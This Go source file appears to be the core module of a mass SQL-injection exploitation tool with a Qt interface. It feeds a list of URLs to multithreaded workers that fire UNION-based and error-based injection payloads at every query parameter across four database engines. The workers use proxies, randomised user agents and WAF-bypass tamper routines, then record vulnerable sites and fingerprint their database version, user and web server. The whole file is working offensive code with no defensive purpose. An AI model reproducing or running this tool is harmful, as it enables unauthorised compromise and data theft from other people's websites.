package modules

import (
	"errors"
	"fmt"
	"git.quartzinc.dev/Zertex/XDGv2/injection"
	"git.quartzinc.dev/Zertex/XDGv2/manager"
	"git.quartzinc.dev/Zertex/XDGv2/qtui"
	"git.quartzinc.dev/Zertex/XDGv2/tamper"
	"git.quartzinc.dev/Zertex/XDGv2/utils"
	"github.com/corpix/uarand"
	"github.com/paulbellamy/ratecounter"
	"github.com/spf13/viper"
	"github.com/therecipe/qt/widgets"
	"net/url"
	"runtime/debug"
	"strings"
	"sync"
	"time"
)

type ExploiterModule struct {
	Index int
	Injectables map[string]*injection.Injection
	InjectCh    chan *injection.Injection
	UrlCh       chan string
	UILock      sync.RWMutex
	WorkerWG    sync.WaitGroup
	TestCh      chan *Test
}

type Test struct {
	injection.Injection
	Query string
	Done *chan interface{}
}

var (
	TestFailedErr = errors.New("injection test failed")
)

var Exploiter *ExploiterModule

func (em *ExploiterModule) InjectableStringArray() []string {
	var list []string
	for _, inj := range em.Injectables {
		list = append(list, inj.ToFormattedString())
	}
	return list
}

func (em *ExploiterModule) PopulateTableRow (index int, inj *injection.Injection) {
	var cStr string
	country, err := inj.GetCountry()
	if err != nil || country == nil {
		cStr = "(N/A)"
	} else {
		cStr = fmt.Sprintf("(%s)", country.Short)
	}
	em.UILock.Lock()
	qtui.Main.ExploiterInjectablesTable.SetItem(index, 0, widgets.NewQTableWidgetItem2(fmt.Sprintf("%s %s", cStr, inj.Base.String()), 0))
	qtui.Main.ExploiterInjectablesTable.SetItem(index, 1, widgets.NewQTableWidgetItem2(fmt.Sprintf("%s %s", injection.DBMSString(inj.DBType), injection.TechniqueString(inj.Technique)), 0))
	em.UILock.Unlock()

	inj.ChunkSize = 0
	inj.GetChunkSize()
	dbver, _ := inj.GetDBVersion()
	em.UILock.Lock()
	qtui.Main.ExploiterInjectablesTable.SetItem(index, 2, widgets.NewQTableWidgetItem2(dbver, 0))
	em.UILock.Unlock()
	dbuser, _ := inj.GetDBUser()
	em.UILock.Lock()
	qtui.Main.ExploiterInjectablesTable.SetItem(index, 3, widgets.NewQTableWidgetItem2(dbuser, 0))
	em.UILock.Unlock()
	webserver, _ := inj.GetWebServer()
	em.UILock.Lock()
	qtui.Main.ExploiterInjectablesTable.SetItem(index, 4, widgets.NewQTableWidgetItem2(webserver, 0))
	em.UILock.Unlock()
}

func (em *ExploiterModule) Start(urls []string) {
	//fheap, _ := os.Create("heap0.pprof")
	//sheap, _ := os.Create("heap1.pprof")
	//pprof.WriteHeapProfile(fheap)

	manager.PManager.ResetCtx()
	manager.PManager.Client.Transport = manager.PManager.CreateProxyTransport()
	utils.RequestCounter = 0
	utils.ErrorCounter = 0
	utils.RateCounter = ratecounter.NewRateCounter(1 * time.Second)
	utils.StartTime = time.Now()
	utils.GlobalSem = make(chan interface{}, viper.GetInt("exploiter.threads"))
	utils.WorkerSem = make(chan interface{}, viper.GetInt("exploiter.threads") * viper.GetInt("exploiter.workers"))

	em.InjectCh = make(chan *injection.Injection)
	em.UrlCh = make(chan string)
	em.Injectables = make(map[string]*injection.Injection)

	utils.Done = make(chan interface{})
	utils.Kill = make(chan interface{})
	go func() {
		f := utils.CreateFileTimeStamped("inj", "injectables")
		if f == nil {
			panic("couldn't create injectables file")
		}
		defer f.Close()
		for inj := range em.InjectCh {
			//_u, _ := url.Parse(inj.Base)k
			if _, ok := em.Injectables[inj.Base.Hostname()]; !ok {
				// _u.Hostname()
				em.Injectables[inj.Base.Hostname()] = inj
				if _, err := f.WriteString(inj.ToFormattedString() + "\r\n"); err != nil {
					fmt.Println(err.Error())
				}
				//geo, _ := geoip.New()
				index := qtui.Main.ExploiterInjectablesTable.RowCount()
				qtui.Main.ExploiterInjectablesTable.SetRowCount(index + 1)
				go em.PopulateTableRow(index, inj)
			}
		}
	}()

	wg := sync.WaitGroup{}
	wg.Add(viper.GetInt("exploiter.threads"))
	for i := 0; i < viper.GetInt("exploiter.threads"); i++ {
		utils.GlobalSem <- 0
		go func() {
			defer func() {
				<-utils.GlobalSem
				wg.Done()
			}()

			for _url := range em.UrlCh {
				living, _, _, tampers, _, possibleDBMS := injection.WAFTest(_url)
				if living {
					u, _ := url.Parse(_url)
					ua := uarand.GetRandom()

					_tmysql := viper.GetBool("exploiter.DBMS.MySQL")
					_tmssql := viper.GetBool("exploiter.DBMS.MSSQL")
					_tpostgres := viper.GetBool("exploiter.DBMS.PostGreSQL")
					_toracle := viper.GetBool("exploiter.DBMS.Oracle")

					if possibleDBMS != -1 {
						switch possibleDBMS {
						case injection.MYSQL:
							_tmssql = false
							_tpostgres = false
							_toracle = false
						case injection.MSSQL:
							_tmysql = false
							_tpostgres = false
							_toracle = false
						case injection.POSTGRES:
							_tmssql = false
							_tmysql = false
							_toracle = false
						case injection.ORACLE:
							_tmssql = false
							_tmysql = false
							_tpostgres = false
						}
					}

					done := make(chan interface{})
					found := make(chan *injection.Injection)

					go func(found *chan *injection.Injection, done *chan interface{}) {
						var best *injection.Injection
						for {
							select {
							case i := <- *found:
								if i.VerifyInjection() {
									if best == nil {
										best = i
									} else if i.Technique == injection.UNION {
										best = i
									}
								}
							case <-*done:
								if best != nil {
									em.InjectCh <- best
								}
								return
							}
						}
					}(&found, &done)

					testCh := make(chan *Test)

					workerWG := sync.WaitGroup{}
					workerWG.Add(viper.GetInt("exploiter.workers"))
					for i:=0; i<viper.GetInt("exploiter.workers"); i++ {
						utils.WorkerSem<-0
						go em.WorkerFunc(&testCh, &workerWG, &found)
					}

					errDone := make(chan interface{})
					uniDone := make(chan interface{})
					for mi, modulator := range injection.Modulators {
						switch viper.GetInt("exploiter.Intensity") {
						case 0:
							if mi > 17 {
								goto testsDone
							}
						case 1:
							if mi > 27 {
								goto testsDone
							}
						}
						for i := 0; i < 4; i++ {
							switch i {
							case injection.MYSQL:
								if !_tmysql {
									continue
								}
							case injection.MSSQL:
								if !_tmssql {
									continue
								}
							case injection.POSTGRES:
								if !_tpostgres {
									continue
								}
							case injection.ORACLE:
								if !_toracle {
									continue
								}
							default:
								continue
							}
							test, vectors := injection.GetTestVariables(i)
							for param := range u.Query() {
								if viper.GetBool("exploiter.technique.union") {
									select {
									case <-utils.Done:
										goto testsDone
									case <-uniDone:
										continue
									case testCh <- &Test{
											Injection: injection.Injection{
												Technique: injection.UNION,
												Base:      u,
												Prefix:    modulator[0],
												Suffix:    modulator[1],
												UserAgent: ua,
												Parameter: param,
												Tampers:   tampers,
												Mod:       mi,
												DBType:    i,
											},
											Query:     test,
											Done:      &uniDone,
										}:
									}
								}
								if viper.GetBool("exploiter.technique.error") {
									for _, vector := range *vectors {
										for j := 0; j < 2; j++ {
											method := "AND"
											if j == 1 {
												method = "OR"
											}
											select {
											case <-utils.Done:
												goto testsDone
											case <-errDone:
												continue
											case testCh <- &Test{
													Injection: injection.Injection{
														Technique: injection.ERROR,
														Vector:    vector,
														Method:    method,
														Base:      u,
														Prefix:    modulator[0],
														Suffix:    modulator[1],
														UserAgent: ua,
														Parameter: param,
														DBType:    i,
														Tampers:   tampers,
														Mod:       mi,
													},
													Query: test,
													Done:  &errDone,
												}:
											}
										}
									}
								}
							}
						}
					}
				testsDone:

					select {
					case <-errDone:
					default:
						close(errDone)
					}
					select {
					case <-uniDone:
					default:
						close(uniDone)
					}

					//vecWG.Wait()
					close(testCh)
					f := make(chan interface{})
					go func() {
						workerWG.Wait()
						close(f)
					}()
					select {
					case <-f:
					case <-utils.Kill:
					}
					select {
					case <-done:
					default:
						close(done)
					}
					debug.FreeOSMemory()
				}
			}
		}()
	}
	var u string
	for em.Index, u = range urls {
		select {
		case <-utils.Done:
			goto popoff
		case em.UrlCh <- u:
		}
	}
popoff:
	//pprof.WriteHeapProfile(sheap)
	close(em.UrlCh)
	f := make(chan interface{})
	go func() {
		wg.Wait()
		close(f)
	}()
	select {
	case <-f:
		em.Index = 0
	case <-utils.Kill:
	}
}

func (em *ExploiterModule) WorkerFunc(testCh *chan *Test, workerWG *sync.WaitGroup, found *chan *injection.Injection) {
	defer func() {
		workerWG.Done()
		<-utils.WorkerSem
	}()
	//for test := range testCh {
	for test := range *testCh {
		select {
		case <-utils.Kill:
			return
		case <-*test.Done:
			continue
		default:
			switch test.Technique {
			case injection.UNION:
				uc := 0
				for i := 1; i <= 40; i++ {
					select {
					case <-utils.Kill:
						return
					case <-*test.Done:
						continue
					default:
						_u, _ := url.Parse(test.Base.String())
						payload, _, _ := injection.BuildInjectionRaw(injection.U_Vectors["multi"], "NULL", "", injection.ParseModulator(test.Prefix), injection.ParseModulator(test.Suffix), injection.UNION, test.DBType, i, 0, 1, 54, false, false)

						m := test.Base.Query()
						m.Set(test.Parameter, test.Base.Query().Get(test.Parameter)+tamper.Tamper(payload, test.Tampers))
						_u.RawQuery = m.Encode()

						_, res, err := manager.PManager.GetWithErrorsSkip(_u.String(), test.UserAgent, nil, test.Done)
						if err != nil {
							continue
						}

						if strings.Contains(res, "SELECT statements have a different number") {
							continue
						}

						if !strings.Contains(res, "mysql_fetch_array()") {
							uc = i
							goto ucc
						}
					}
				}
				continue
			ucc:

				for i := 0; i < uc; i++ {
					select {
					case <-*test.Done:
						continue
					case <-utils.Kill:
						return
					default:
						payload, begincap, endcap := injection.BuildInjectionRaw(injection.U_Vectors["multi"], test.Query, "", injection.ParseModulator(test.Prefix), injection.ParseModulator(test.Suffix), injection.UNION, test.DBType, uc, i, 1, 54, false, false)
						_u, _ := url.Parse(test.Base.String())
						m := test.Base.Query()
						m.Set(test.Parameter, test.Base.Query().Get(test.Parameter)+tamper.Tamper(payload, test.Tampers))
						_u.RawQuery = m.Encode()

						_, res, err := manager.PManager.GetWithErrorsSkip(_u.String(), test.UserAgent, nil, test.Done)
						if err != nil {
							continue
						}

						if utils.GetStringInBetween(res, begincap, endcap) == "1" {
							select {
							case <-utils.Kill:
								return
							case <-*test.Done:
								continue
							case *found <- &injection.Injection{
								Vector:    injection.U_Vectors["multi"],
								Technique: injection.UNION,
								Base:      test.Base,
								Prefix:    test.Prefix,
								Suffix:    test.Suffix,
								UserAgent: test.UserAgent,
								Parameter: test.Parameter,
								Tampers:   test.Tampers,
								UCount:    uc,
								UInj:      i,
								Mod:       test.Mod,
								DBType:    test.DBType,
							}:
								select {
								case <-*test.Done:
								default:
									close(*test.Done)
								}
							}
						}
					}
				}
			case injection.ERROR:
				_u, _ := url.Parse(test.Base.String())
				payload, begincap, endcap := injection.BuildInjectionRaw(test.Vector, test.Query, test.Method, injection.ParseModulator(test.Prefix), injection.ParseModulator(test.Suffix), injection.ERROR, test.DBType, 0, 0, 1, 54, false, false)
				m := test.Base.Query()
				m.Set(test.Parameter, test.Base.Query().Get(test.Parameter)+tamper.Tamper(payload, test.Tampers))
				_u.RawQuery = m.Encode()
				_, res, err := manager.PManager.GetWithErrorsSkip(_u.String(), test.UserAgent, nil, test.Done)
				if err != nil {
					continue
				}
				if utils.GetStringInBetween(res, begincap, endcap) == "1" {
					select {
					case <-utils.Kill:
						return
					case <-*test.Done:
						continue
					case *found <- &injection.Injection{
						Vector:    test.Vector,
						Technique: injection.ERROR,
						Method:    test.Method,
						Base:      test.Base,
						Prefix:    test.Prefix,
						Suffix:    test.Suffix,
						Mod:       test.Mod,
						UserAgent: test.UserAgent,
						Parameter: test.Parameter,
						Tampers:   test.Tampers,
						DBType:    test.DBType,
					}:
						select {
						case <-*test.Done:
						default:
							close(*test.Done)
						}
					}
				}
			case injection.BLIND:

			}
		}
	}
}